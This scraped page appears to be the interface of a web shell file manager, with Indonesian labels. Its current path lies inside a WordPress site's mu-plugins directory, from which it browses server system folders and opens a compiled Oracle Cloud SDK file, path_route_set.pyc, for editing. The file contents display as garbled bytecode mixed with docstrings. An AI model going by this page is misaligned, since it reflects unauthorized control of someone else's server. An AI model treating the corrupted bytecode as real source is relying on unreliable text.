📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
load_balancer
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/load_balancer/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: path_route_set.pyc
a O��f � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ sd e Zd ZdZdd� Zedd� �Zejdd� �Zedd� �Zejd d� �Zd d� Z dd � Z dd� ZdS )�PathRouteSeta9 A named set of path route rules. For more information, see `Managing Request Routing`__. **Warning:** Oracle recommends that you avoid using any confidential information when you supply string values using the API. __ https://docs.cloud.oracle.com/Content/Balance/Tasks/managingrequest.htm c K s( ddd�| _ ddd�| _d| _d| _dS )a� Initializes a new PathRouteSet object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param name: The value to assign to the name property of this PathRouteSet. :type name: str :param path_routes: The value to assign to the path_routes property of this PathRouteSet. :type path_routes: list[oci.load_balancer.models.PathRoute] �strzlist[PathRoute])�name�path_routesr � pathRoutesN)� swagger_types� attribute_map�_name�_path_routes)�self�kwargs� r ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/load_balancer/models/path_route_set.py�__init__ s ��zPathRouteSet.__init__c C s | j S )a **[Required]** Gets the name of this PathRouteSet. The unique name for this set of path route rules. Avoid entering confidential information. Example: `example_path_route_set` :return: The name of this PathRouteSet. :rtype: str �r �r r r r r 0 s zPathRouteSet.namec C s || _ dS )a Sets the name of this PathRouteSet. The unique name for this set of path route rules. Avoid entering confidential information. Example: `example_path_route_set` :param name: The name of this PathRouteSet. :type: str Nr )r r r r r r >